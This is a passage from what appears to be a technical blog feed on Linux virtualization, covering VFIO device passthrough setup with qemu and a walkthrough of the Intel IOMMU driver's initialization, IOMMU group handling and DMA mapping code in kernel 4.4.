<p>Userspace can set up the iova(GPA)->HPA mapping by calling ioctl(VFIO_IOMMU_MAP_DMA) on the container fd. The argument for ‘VFIO_IOMMU_MAP_DMA’ is a ‘vfio_iommu_type1_dma_map’, defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfio_iommu_type1_dma_map {
__u32 argsz;
__u32 flags;
#define VFIO_DMA_MAP_FLAG_READ (1 << 0) /* readable from device */
#define VFIO_DMA_MAP_FLAG_WRITE (1 << 1) /* writable from device */
__u64 vaddr; /* Process virtual address */
__u64 iova; /* IO virtual address */
__u64 size; /* Size of mapping (bytes) */
};
</code></pre></div></div>
<p>The ‘vaddr’ is a virtual address in the qemu process; the ‘iova’ is the IO virtual address from the device’s view. The handler for this ioctl is ‘vfio_dma_do_map’. It pins the physical pages backing qemu’s virtual address range and then calls ‘vfio_iommu_map’ to set up the iova-to-hpa mapping, which calls ‘iommu_map’ and finally the ‘iommu_ops’ map callback, ‘intel_iommu_map’, to complete the mapping work.</p>
VFIO usage2019-08-16T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/16/vfio-usage
<p>VFIO is used to assign a physical IO device to a virtual machine. I will write some posts to explain how VFIO works internally. First of all, we need to know how to use VFIO. We will create a VMware Workstation virtual machine (VM1); inside it, we will create a qemu virtual machine (VM2) and assign one of VM1’s devices to VM2.</p>
<h3> 1 </h3>
<p>Create a new network device for VM1 in VMware Workstation, open the .vmx file with an editor, and change the new network adapter’s type from e1000 to vmxnet3.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ethernet1.virtualDev = "vmxnet3"
</code></pre></div></div>
<h3> 2 </h3>
<p>Find the PCI address (BDF) of the device in the system (lspci -v):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 03:00.0 Ethernet controller: VMware VMXNET3 Ethernet Controller (rev 01)
</code></pre></div></div>
<h3> 3 </h3>
<p>Find the device’s iommu group; these groups are generated when the iommu initializes.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ ls -lh /sys/bus/pci/devices/0000:03:00.0/iommu_group/devices
total 0
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.0 -> ../../../../devices/pci0000:00/0000:00:15.0
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.1 -> ../../../../devices/pci0000:00/0000:00:15.1
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.2 -> ../../../../devices/pci0000:00/0000:00:15.2
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.3 -> ../../../../devices/pci0000:00/0000:00:15.3
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.4 -> ../../../../devices/pci0000:00/0000:00:15.4
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.5 -> ../../../../devices/pci0000:00/0000:00:15.5
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.6 -> ../../../../devices/pci0000:00/0000:00:15.6
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.7 -> ../../../../devices/pci0000:00/0000:00:15.7
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:03:00.0 -> ../../../../devices/pci0000:00/0000:00:15.0/0000:03:00.0
</code></pre></div></div>
<p>In general, devices in the same iommu group should be assigned to the same domain. However, in this example only our vmxnet3 network card is a PCI endpoint device; the others are all PCI bridges, and vfio-pci does not currently support PCI bridges.</p>
<h3> 4 </h3>
<p>Unbind the device with the driver</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> echo 0000:01:10.0 >/sys/bus/pci/devices/0000:03:00.0/driver/unbind
</code></pre></div></div>
<h3> 5 </h3>
<p>Find the vendor and device ID</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ lspci -n -s 0000:03:00.0
03:00.0 0200: 15ad:07b0 (rev 01)
</code></pre></div></div>
<h3> 6 </h3>
<p>Bind the device to vfio-pci driver(should modprobe vfio-pci firstly)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> echo 15ad 07b0 > /sys/bus/pci/drivers/vfio-pci/new_id
</code></pre></div></div>
<p>Now we can see a new node created in ‘/dev/vfio/’; its name is the group id.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ ls -l /dev/vfio/
total 0
crw------- 1 root root 243, 0 Aug 14 08:23 6
crw-rw-rw- 1 root root 10, 196 Aug 14 08:23 vfio
</code></pre></div></div>
<h3> 7 </h3>
<p>Start qemu with the assigned device:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> x86_64-softmmu/qemu-system-x86_64 -m 1024 -smp 4 -hda /home/test/test.img --enable-kvm -vnc :0 --enable-kvm -device vfio-pci,host=03:00.0,id=net0
</code></pre></div></div>
<p>Now we can see the device in the guest, and its driver is vmxnet3.</p>
<p><img src="/assets/img/vfio1/1.png" alt="" /></p>
intel IOMMU driver analysis2019-08-10T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/10/iommu-driver-analysis
<p>In the last post <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/04/iommu-introduction">IOMMU introduction</a> we have got the basic idea of what is IOMMU and what it is for. In this post, we will dig into the intel-iommu driver source. The kernel version as before is 4.4.</p>
<p>In order to experiment with the IOMMU, we start a VM with a vIOMMU; the following is the command line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> gdb --args x86_64-softmmu/qemu-system-x86_64 -machine q35,accel=kvm,kernel-irqchip=split -m 1G -device intel-iommu -hda ~/test.img
</code></pre></div></div>
<p>In order to enable the intel-iommu we need to add ‘intel_iommu=on’ to the kernel command line.</p>
<p>This post contains the following five parts:</p>
<ul>
<li>intel-iommu initialization</li>
<li>DMAR table parsing</li>
<li>DMAR initialization</li>
<li>Add device to iommu group</li>
<li>DMA operation without and with IOMMU</li>
</ul>
<h3> intel-iommu initialization </h3>
<p>The BIOS is responsible for detecting the remapping hardware functions and reports the remapping hardware units through the DMA Remapping Reporting (DMAR) ACPI table. The DMAR ACPI table’s format is defined in VT-d spec 8.1. In summary, the DMAR ACPI table contains one DMAR remapping reporting structure and several remapping structures. qemu creates this DMAR ACPI table data in the function ‘build_dmar_q35’.</p>
<p>‘DMAR remapping reporting structure’ contains a standard ACPI table header with some specific data for ‘DMAR’. There are several kinds of ‘Remapping Structure Types’. The type ‘0’ is DMA Remapping Hardware Unit(DRHD) structure, this is the most important structure. A DRHD structure represents a remapping hardware unit present in the platform. Following figure shows the format of DRHD.</p>
<p><img src="/assets/img/iommu_driver/1.png" alt="" /></p>
<p>Here the ‘Segment Number’ is the PCI Segment associated with this unit. PCI Segments exist for servers that need many PCI buses: such a machine has more than one PCI root bridge, and each tree under a root bridge is a PCI Domain/Segment. The ‘Flags’ field currently has only one valid bit. If ‘INCLUDE_PCI_ALL’ is set, the intel-iommu represented by this DRHD controls all PCI compatible devices, except devices reported under the scope of other DRHDs. The ‘Device Scope[]’ field contains zero or more Device Scope Entries; each Device Scope Entry can indicate a PCI endpoint device that is controlled by this DRHD. If the iommu supports interrupt remapping, each IOxAPIC in the platform reported by the MADT ACPI table must be explicitly enumerated under the Device Scope of the appropriate remapping hardware unit. In ‘build_dmar_q35’, qemu only creates one DRHD with an ‘IOAPIC’ device scope entry. If ‘device-iotlb’ is supported, there is also a ‘Root Port ATS Capability Reporting (ATSR) Structure’.</p>
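<p>To make the DRHD layout concrete, here is a hypothetical C sketch of its fixed 16-byte header shown in the figure above; the struct and field names are mine, not the kernel’s, and the variable-length Device Scope entries simply follow this header in memory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdint.h>
#include <stddef.h>

/* Sketch of the fixed part of a DRHD structure. Field names are
 * illustrative; Device Scope entries follow this header in memory. */
struct drhd_header {
    uint16_t type;        /* 0 identifies a DRHD structure */
    uint16_t length;      /* total length incl. device scope entries */
    uint8_t  flags;       /* bit 0: INCLUDE_PCI_ALL */
    uint8_t  reserved;
    uint16_t segment;     /* PCI segment number of this unit */
    uint64_t reg_base;    /* register base address of this unit */
} __attribute__((packed));

/* Does this unit control all PCI devices not claimed elsewhere? */
static inline int drhd_includes_pci_all(const struct drhd_header *h)
{
    return h->flags & 0x1;
}
</code></pre></div></div>
<p>With the packed attribute the header is exactly 16 bytes, matching the field offsets in the figure.</p>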
<p>The kernel handles the ‘intel_iommu=’ parameter in the ‘intel_iommu_setup’ function. For ‘intel_iommu=on’, ‘dmar_disabled’ is set to 0. The kernel function ‘detect_intel_iommu’ detects the intel-iommu device. It calls ‘dmar_table_detect’ to map the DMAR ACPI table into the kernel, pointed to by ‘dmar_tbl’, then walks the table with ‘dmar_res_callback’. There is only a ‘dmar_validate_one_drhd’ handler for the DRHD table, which returns 0 if the DRHD is valid. So finally ‘iommu_detected’ is set to 1 and ‘x86_init.iommu.iommu_init’ is set to ‘intel_iommu_init’.</p>
<p>Later, in ‘pci_iommu_init’, the ‘iommu_init’ callback is called, so ‘intel_iommu_init’ initializes the intel-iommu device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __init intel_iommu_init(void)
{
int ret = -ENODEV;
struct dmar_drhd_unit *drhd;
struct intel_iommu *iommu;
/* VT-d is required for a TXT/tboot launch, so enforce that */
force_on = tboot_force_iommu();
if (iommu_init_mempool()) {
if (force_on)
panic("tboot: Failed to initialize iommu memory\n");
return -ENOMEM;
}
down_write(&dmar_global_lock);
if (dmar_table_init()) {
if (force_on)
panic("tboot: Failed to initialize DMAR table\n");
goto out_free_dmar;
}
if (dmar_dev_scope_init() < 0) {
if (force_on)
panic("tboot: Failed to initialize DMAR device scope\n");
goto out_free_dmar;
}
...
if (dmar_init_reserved_ranges()) {
if (force_on)
panic("tboot: Failed to reserve iommu ranges\n");
goto out_free_reserved_range;
}
init_no_remapping_devices();
ret = init_dmars();
...
up_write(&dmar_global_lock);
pr_info("Intel(R) Virtualization Technology for Directed I/O\n");
init_timer(&unmap_timer);
#ifdef CONFIG_SWIOTLB
swiotlb = 0;
#endif
dma_ops = &intel_dma_ops;
init_iommu_pm_ops();
for_each_active_iommu(iommu, drhd)
iommu->iommu_dev = iommu_device_create(NULL, iommu,
intel_iommu_groups,
"%s", iommu->name);
bus_set_iommu(&pci_bus_type, &intel_iommu_ops);
bus_register_notifier(&pci_bus_type, &device_nb);
if (si_domain && !hw_pass_through)
register_memory_notifier(&intel_iommu_memory_nb);
intel_iommu_enabled = 1;
return 0;
...
}
</code></pre></div></div>
<p>‘iommu_init_mempool’ creates some caches. ‘dmar_table_init’ parses the DMAR table. ‘dmar_dev_scope_init’ does some initialization for the ‘Device Scope’ in the DRHD. ‘dmar_init_reserved_ranges’ reserves all PCI MMIO addresses to avoid peer-to-peer access. As the name indicates, ‘init_no_remapping_devices’ initializes the no-remapping devices. ‘init_dmars’ is an important function; I will use one section to analyze it later. For every iommu device, ‘iommu_device_create’ creates a sysfs device. ‘bus_set_iommu’ adds the current PCI devices to the appropriate iommu groups and also registers a notifier to get device-add notifications.</p>
<h3> DMAR table parsing </h3>
<p>‘intel_iommu_init’ calls ‘dmar_table_init’, which calls ‘parse_dmar_table’ to do the DMAR table parsing.
‘parse_dmar_table’ prepares a ‘dmar_res_callback’ struct which contains a handler for every kind of ‘Remapping Structure’. Then ‘dmar_table_detect’ is called again to map the DMAR ACPI table to ‘dmar_tbl’. Later ‘dmar_walk_dmar_table’ is called with the ‘dmar_res_callback’ to walk ‘dmar_tbl’ and call the corresponding remapping structure handler. For our qemu case, only a DRHD is used, so the handler is ‘dmar_parse_one_drhd’.</p>
<p>‘dmar_parse_one_drhd’ parses the DRHD entry and creates a ‘dmar_drhd_unit’ struct, defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct dmar_drhd_unit {
struct list_head list; /* list of drhd units */
struct acpi_dmar_header *hdr; /* ACPI header */
u64 reg_base_addr; /* register base address*/
struct dmar_dev_scope *devices;/* target device array */
int devices_cnt; /* target device count */
u16 segment; /* PCI domain */
u8 ignored:1; /* ignore drhd */
u8 include_all:1;
struct intel_iommu *iommu;
};
</code></pre></div></div>
<p>Most of the fields are explained by the comments; the ‘iommu’ is allocated and initialized by the ‘alloc_iommu’ function.
‘alloc_iommu’ maps the MMIO of the iommu device and does some initialization work according to the BAR. At the end of ‘dmar_parse_one_drhd’ it calls ‘dmar_register_drhd_unit’ to add our new ‘dmar_drhd_unit’ to the ‘dmar_drhd_units’ list. The following figure shows the relation between ‘dmar_drhd_unit’ and ‘intel_iommu’.</p>
<p><img src="/assets/img/iommu_driver/2.png" alt="" /></p>
<p>‘dmar_dev_scope_init’ is used to initialize the Device Scope Entries in the DRHD, but as our one DRHD sets the ‘INCLUDE_PCI_ALL’ flag, it actually does nothing.</p>
<p>‘dmar_init_reserved_ranges’ reserves the ‘IOAPIC’ range and all PCI MMIO addresses, so that PCI device DMA will never use these addresses as IOVAs.</p>
<p>‘init_no_remapping_devices’ also does nothing as our DRHD sets the ‘INCLUDE_PCI_ALL’ flag.</p>
<h3> DMAR initialization </h3>
<p>So we come to the ‘init_dmars’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int __init init_dmars(void)
{
struct dmar_drhd_unit *drhd;
struct dmar_rmrr_unit *rmrr;
bool copied_tables = false;
struct device *dev;
struct intel_iommu *iommu;
int i, ret;
/*
* for each drhd
* allocate root
* initialize and program root entry to not present
* endfor
*/
for_each_drhd_unit(drhd) {
/*
* lock not needed as this is only incremented in the single
* threaded kernel __init code path all other access are read
* only
*/
if (g_num_of_iommus < DMAR_UNITS_SUPPORTED) {
g_num_of_iommus++;
continue;
}
pr_err_once("Exceeded %d IOMMUs\n", DMAR_UNITS_SUPPORTED);
}
/* Preallocate enough resources for IOMMU hot-addition */
if (g_num_of_iommus < DMAR_UNITS_SUPPORTED)
g_num_of_iommus = DMAR_UNITS_SUPPORTED;
g_iommus = kcalloc(g_num_of_iommus, sizeof(struct intel_iommu *),
GFP_KERNEL);
if (!g_iommus) {
pr_err("Allocating global iommu array failed\n");
ret = -ENOMEM;
goto error;
}
deferred_flush = kzalloc(g_num_of_iommus *
sizeof(struct deferred_flush_tables), GFP_KERNEL);
if (!deferred_flush) {
ret = -ENOMEM;
goto free_g_iommus;
}
for_each_active_iommu(iommu, drhd) {
g_iommus[iommu->seq_id] = iommu;
intel_iommu_init_qi(iommu);
ret = iommu_init_domains(iommu);
if (ret)
goto free_iommu;
init_translation_status(iommu);
if (translation_pre_enabled(iommu) && !is_kdump_kernel()) {
iommu_disable_translation(iommu);
clear_translation_pre_enabled(iommu);
pr_warn("Translation was enabled for %s but we are not in kdump mode\n",
iommu->name);
}
/*
* TBD:
* we could share the same root & context tables
* among all IOMMU's. Need to Split it later.
*/
ret = iommu_alloc_root_entry(iommu);
if (ret)
goto free_iommu;
...
}
/*
* Now that qi is enabled on all iommus, set the root entry and flush
* caches. This is required on some Intel X58 chipsets, otherwise the
* flush_context function will loop forever and the boot hangs.
*/
for_each_active_iommu(iommu, drhd) {
iommu_flush_write_buffer(iommu);
iommu_set_root_entry(iommu);
iommu->flush.flush_context(iommu, 0, 0, 0, DMA_CCMD_GLOBAL_INVL);
iommu->flush.flush_iotlb(iommu, 0, 0, 0, DMA_TLB_GLOBAL_FLUSH);
}
...
/*
* If we copied translations from a previous kernel in the kdump
* case, we can not assign the devices to domains now, as that
* would eliminate the old mappings. So skip this part and defer
* the assignment to device driver initialization time.
*/
if (copied_tables)
goto domains_done;
...
domains_done:
/*
* for each drhd
* enable fault log
* global invalidate context cache
* global invalidate iotlb
* enable translation
*/
for_each_iommu(iommu, drhd) {
if (drhd->ignored) {
/*
* we always have to disable PMRs or DMA may fail on
* this device
*/
if (force_on)
iommu_disable_protect_mem_regions(iommu);
continue;
}
iommu_flush_write_buffer(iommu);
#ifdef CONFIG_INTEL_IOMMU_SVM
if (pasid_enabled(iommu) && ecap_prs(iommu->ecap)) {
ret = intel_svm_enable_prq(iommu);
if (ret)
goto free_iommu;
}
#endif
ret = dmar_set_interrupt(iommu);
if (ret)
goto free_iommu;
if (!translation_pre_enabled(iommu))
iommu_enable_translation(iommu);
iommu_disable_protect_mem_regions(iommu);
}
return 0;
...
}
</code></pre></div></div>
<p>First it iterates over ‘dmar_drhd_units’ to count the iommu devices, storing the count in ‘g_num_of_iommus’, and allocates space for all the iommu pointers in ‘g_iommus’. Then the ‘for_each_active_iommu’ loop initializes each iommu device.</p>
<p>In the loop, ‘intel_iommu_init_qi’ initializes the queued invalidation interface, described in VT-d spec 6.5.2. ‘intel_iommu_init_qi’ allocates the queued invalidation interface’s ring buffer, stores it in ‘iommu->qi’ and writes its physical address to the iommu device’s ‘DMAR_IQA_REG’ register.</p>
<p>Returning to the loop, after the queued invalidation initialization finishes, ‘iommu_init_domains’ is called to initialize the domain-related data structures. Quoting the VT-d spec: a domain is abstractly defined as an isolated environment in the platform, to which a subset of the host physical memory is allocated. I/O devices that are allowed to access physical memory directly are allocated to a domain and are referred to as the domain’s assigned devices. For virtualization
usages, software may treat each virtual machine as a domain. ‘iommu_init_domains’ allocates a bitmap used for the domain ids and stores it in ‘iommu->domain_ids’. A domain is represented by the ‘dmar_domain’ struct. An iommu can support many domains but may use only a few of them, so we cannot preallocate all the ‘dmar_domain*’ pointers. Instead, a two-level allocation is used: ‘iommu->domains’ points to an array of ‘dmar_domain**’, and each ‘iommu->domains[i]’ points to a second-level array. Initially only 256 ‘dmar_domain*’ pointers are allocated.</p>
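<p>The two-level layout can be sketched in userspace C as follows. The ‘fake_iommu’ struct and helper names here are mine, a simplified stand-in for the real logic in ‘iommu_init_domains’ and its lookup path:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdlib.h>

struct dmar_domain { int id; };

/* First level: array of pointers to second-level pages; each
 * second-level page holds 256 dmar_domain pointers. */
struct fake_iommu {
    struct dmar_domain ***domains;
};

static struct dmar_domain *get_domain(struct fake_iommu *iommu, int did)
{
    int idx = did >> 8;                      /* first-level index */
    if (!iommu->domains[idx])                /* allocate lazily */
        iommu->domains[idx] = calloc(256, sizeof(struct dmar_domain *));
    return iommu->domains[idx][did & 0xff];  /* second-level index */
}

static void set_domain(struct fake_iommu *iommu, int did, struct dmar_domain *d)
{
    (void)get_domain(iommu, did);            /* ensure second level exists */
    iommu->domains[did >> 8][did & 0xff] = d;
}
</code></pre></div></div>
<p>Only the second-level pages that are actually touched get allocated, which is the point of the scheme.</p>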
<p>In the loop, we allocate the root table by calling ‘iommu_alloc_root_entry’.</p>
<p>‘init_dmars’ then does the second ‘for_each_active_iommu’ loop; this time it just programs the root table’s base address into the hardware by calling ‘iommu_set_root_entry’.</p>
<p>‘init_dmars’ calls ‘iommu_prepare_isa’ to do an identity map for the ISA bridge. Then we reach the final ‘for_each_iommu’ loop. It first calls ‘iommu_flush_write_buffer’, then requests an irq (‘dmar_set_interrupt’) to log DMA remapping faults, and finally calls ‘iommu_enable_translation’ to enable translation.</p>
<p>After ‘init_dmars’, the data structures look as shown below.</p>
<p><img src="/assets/img/iommu_driver/3.png" alt="" /></p>
<h3> Add device to iommu group </h3>
<p>An IOMMU group is the smallest set of devices that can be considered isolated from the perspective of the IOMMU. Some devices can do peer-to-peer DMA without the involvement of the IOMMU; if such devices had different IOVA page tables and did peer-to-peer DMA, it would cause errors. Alex Williamson has written a great post explaining IOMMU groups: <a href="http://vfio.blogspot.com/2014/08/iommu-groups-inside-and-out.html">IOMMU Groups, inside and out</a>. In ‘intel_iommu_init’, ‘bus_set_iommu’ is called to add each PCI device to its iommu group.</p>
<p>‘bus_set_iommu’ is used to set the iommu callbacks for a bus. The following sets the pci bus’s iommu callbacks to intel_iommu_ops.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bus_set_iommu(&pci_bus_type, &intel_iommu_ops);
</code></pre></div></div>
<p>‘bus_set_iommu’ sets ‘bus->iommu_ops’ to the ‘ops’ parameter, then calls ‘iommu_bus_init’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int iommu_bus_init(struct bus_type *bus, const struct iommu_ops *ops)
{
int err;
struct notifier_block *nb;
struct iommu_callback_data cb = {
.ops = ops,
};
nb = kzalloc(sizeof(struct notifier_block), GFP_KERNEL);
if (!nb)
return -ENOMEM;
nb->notifier_call = iommu_bus_notifier;
err = bus_register_notifier(bus, nb);
if (err)
goto out_free;
err = bus_for_each_dev(bus, NULL, &cb, add_iommu_group);
if (err)
goto out_err;
return 0;
out_err:
/* Clean up */
bus_for_each_dev(bus, NULL, &cb, remove_iommu_group);
bus_unregister_notifier(bus, nb);
out_free:
kfree(nb);
return err;
}
</code></pre></div></div>
<p>‘iommu_bus_init’ registers a notifier for bus events, which is useful for hot-plugged devices. The main work is to call ‘add_iommu_group’ for every PCI device. ‘add_iommu_group’ just calls the ‘iommu_ops’ add_device callback, which is ‘intel_iommu_add_device’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int intel_iommu_add_device(struct device *dev)
{
struct intel_iommu *iommu;
struct iommu_group *group;
u8 bus, devfn;
iommu = device_to_iommu(dev, &bus, &devfn);
if (!iommu)
return -ENODEV;
iommu_device_link(iommu->iommu_dev, dev);
group = iommu_group_get_for_dev(dev);
if (IS_ERR(group))
return PTR_ERR(group);
iommu_group_put(group);
return 0;
}
</code></pre></div></div>
<p>First, get the ‘intel_iommu’ associated with the device ‘dev’ and also the ‘bus’ and ‘devfn’ of the device.
This is quite easy: take the device’s domain (segment) id and use it to find the ‘intel_iommu’ in the ‘dmar_drhd_units’ list.</p>
<p>The ‘iommu_device_link’ function is also trivial: it creates a link file ‘iommu’ in the PCI device directory pointing to the iommu device directory, and also a link in the iommu ‘devices’ directory pointing to the PCI device.</p>
<p>The most important is ‘iommu_group_get_for_dev’; this function finds or creates the IOMMU group for a device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct iommu_group *iommu_group_get_for_dev(struct device *dev)
{
const struct iommu_ops *ops = dev->bus->iommu_ops;
struct iommu_group *group;
int ret;
group = iommu_group_get(dev);
...
if (ops && ops->device_group)
group = ops->device_group(dev);
...
ret = iommu_group_add_device(group, dev);
...
return group;
}
</code></pre></div></div>
<p>A device’s iommu group is stored in the ‘device’ struct’s iommu_group field. ‘iommu_group_get’ returns it; if it is not NULL, we just return this group. The first time, it is NULL, so the ‘iommu_ops’ device_group callback is called, which is ‘pci_device_group’ for intel iommu.</p>
<p>‘pci_device_group’ finds or creates an IOMMU group for a device. There are several cases where a device gets its IOMMU group from an existing device.
For example, if a bridge does not support ACS, devices behind it can do peer-to-peer DMA, so we need to walk up to the upstream bus. Also, all functions of a multi-function device need to share the same IOMMU group. If ‘pci_device_group’ cannot find an existing IOMMU group, it calls ‘iommu_group_alloc’ to create a new one. ‘iommu_group_alloc’ creates a numbered directory under ‘/sys/kernel/iommu_groups’, for example ‘/sys/kernel/iommu_groups/3’.</p>
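<p>As a small illustration of the multi-function case, the grouping decision keys off the slot part of devfn. The helpers below are simplified stand-ins for the kernel’s PCI_SLOT/PCI_FUNC macros:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* devfn packs device (slot) and function: slot in bits 7:3,
 * function in bits 2:0, like the kernel's PCI_SLOT/PCI_FUNC. */
static inline unsigned int slot_of(unsigned int devfn) { return devfn >> 3; }
static inline unsigned int func_of(unsigned int devfn) { return devfn & 0x7; }

/* Functions of one multi-function device share a slot, so they
 * end up in the same IOMMU group. */
static inline int same_device(unsigned int a, unsigned int b)
{
    return slot_of(a) == slot_of(b);
}
</code></pre></div></div>
<p>For example, 03:00.0 and 03:00.1 share slot 0 and therefore a group, while 03:01.0 is a different device.</p>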
<p>After getting the device’s IOMMU group, ‘iommu_group_get_for_dev’ calls ‘iommu_group_add_device’ to add the device to the group. It first creates an ‘iommu_group’ link in the PCI device’s directory pointing to ‘/sys/kernel/iommu_groups/$group_id’, then creates a link ‘/sys/kernel/iommu_groups/$group_id/devices/0000:$pci_bdf’ pointing to the PCI device.
Finally it sets the device’s iommu_group to ‘group’ and adds the device to the ‘group->devices’ list.</p>
<p>That is a lot of functions, so let’s wrap up the call chain:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>intel_iommu_init
 -> bus_set_iommu
   -> iommu_bus_init
     -> add_iommu_group                (for each PCI device)
       -> iommu_ops->add_device        (intel_iommu_add_device)
         -> device_to_iommu
         -> iommu_device_link
         -> iommu_group_get_for_dev
           -> iommu_ops->device_group  (pci_device_group)
             -> iommu_group_alloc
           -> iommu_group_add_device
</code></pre></div></div>
<h3> DMA operation without and with IOMMU </h3>
<p>Now that the IOMMU has been initialized, what is the difference when a device does DMA with and without the IOMMU? In this part I will do some analysis, though not covering every detail of DMA.</p>
<p>A driver uses the ‘dma_alloc_coherent’ function to allocate physical memory for DMA. It returns the virtual address, and the DMA address is returned through the third argument. ‘dma_alloc_coherent’ calls ‘dma_ops->alloc’. ‘dma_ops’ is set to ‘intel_dma_ops’ in ‘intel_iommu_init’, so for intel iommu this callback is ‘intel_alloc_coherent’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void *intel_alloc_coherent(struct device *dev, size_t size,
dma_addr_t *dma_handle, gfp_t flags,
struct dma_attrs *attrs)
{
struct page *page = NULL;
int order;
size = PAGE_ALIGN(size);
order = get_order(size);
if (!iommu_no_mapping(dev))
flags &= ~(GFP_DMA | GFP_DMA32);
else if (dev->coherent_dma_mask < dma_get_required_mask(dev)) {
if (dev->coherent_dma_mask < DMA_BIT_MASK(32))
flags |= GFP_DMA;
else
flags |= GFP_DMA32;
}
if (gfpflags_allow_blocking(flags)) {
unsigned int count = size >> PAGE_SHIFT;
page = dma_alloc_from_contiguous(dev, count, order);
if (page && iommu_no_mapping(dev) &&
page_to_phys(page) + size > dev->coherent_dma_mask) {
dma_release_from_contiguous(dev, page, count);
page = NULL;
}
}
if (!page)
page = alloc_pages(flags, order);
if (!page)
return NULL;
memset(page_address(page), 0, size);
*dma_handle = __intel_map_single(dev, page_to_phys(page), size,
DMA_BIDIRECTIONAL,
dev->coherent_dma_mask);
if (*dma_handle)
return page_address(page);
if (!dma_release_from_contiguous(dev, page, size >> PAGE_SHIFT))
__free_pages(page, order);
return NULL;
}
</code></pre></div></div>
<p>It first allocates the needed memory (by calling ‘dma_alloc_from_contiguous’ or just ‘alloc_pages’), then calls ‘__intel_map_single’ to do the memory mapping.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static dma_addr_t __intel_map_single(struct device *dev, phys_addr_t paddr,
size_t size, int dir, u64 dma_mask)
{
struct dmar_domain *domain;
phys_addr_t start_paddr;
struct iova *iova;
int prot = 0;
int ret;
struct intel_iommu *iommu;
unsigned long paddr_pfn = paddr >> PAGE_SHIFT;
...
domain = get_valid_domain_for_dev(dev);
if (!domain)
return 0;
iommu = domain_get_iommu(domain);
size = aligned_nrpages(paddr, size);
iova = intel_alloc_iova(dev, domain, dma_to_mm_pfn(size), dma_mask);
if (!iova)
goto error;
...
ret = domain_pfn_mapping(domain, mm_to_dma_pfn(iova->pfn_lo),
mm_to_dma_pfn(paddr_pfn), size, prot);
...
start_paddr = (phys_addr_t)iova->pfn_lo << PAGE_SHIFT;
start_paddr += paddr & ~PAGE_MASK;
return start_paddr;
...
}
</code></pre></div></div>
<p>The skeleton of ‘__intel_map_single’ is shown above. It first gets/creates a domain by calling ‘get_valid_domain_for_dev’, then allocates the IOVA by calling ‘intel_alloc_iova’, and finally sets up the IOVA-to-physical-address mapping by calling ‘domain_pfn_mapping’. The IOVA is returned.</p>
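<p>One small detail worth showing is the size calculation: the mapping covers whole pages, including the offset of ‘paddr’ within its first page. Here is a simplified rewrite of the ‘aligned_nrpages’ idea, assuming 4&nbsp;KB pages (the name follows the kernel, the body is a sketch):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stddef.h>

#define VTD_PAGE_SHIFT 12
#define VTD_PAGE_SIZE  (1UL << VTD_PAGE_SHIFT)

/* Number of 4 KB pages needed to map [paddr, paddr + size). */
static unsigned long aligned_nrpages(unsigned long long paddr, size_t size)
{
    unsigned long long offset = paddr & (VTD_PAGE_SIZE - 1);
    return (offset + size + VTD_PAGE_SIZE - 1) >> VTD_PAGE_SHIFT;
}
</code></pre></div></div>
<p>A tiny buffer that straddles a page boundary still needs two page mappings, which is why the offset is included.</p>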
<p>As the domain’s definition indicates, if the system allocates physical memory to a device, a domain needs to be bound to this physical memory. A domain is represented by the ‘dmar_domain’ structure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct dmar_domain {
int nid; /* node id */
unsigned iommu_refcnt[DMAR_UNITS_SUPPORTED];
/* Refcount of devices per iommu */
u16 iommu_did[DMAR_UNITS_SUPPORTED];
/* Domain ids per IOMMU. Use u16 since
* domain ids are 16 bit wide according
* to VT-d spec, section 9.3 */
struct list_head devices; /* all devices' list */
struct iova_domain iovad; /* iova's that belong to this domain */
struct dma_pte *pgd; /* virtual address */
int gaw; /* max guest address width */
/* adjusted guest address width, 0 is level 2 30-bit */
int agaw;
int flags; /* flags to find out type of domain */
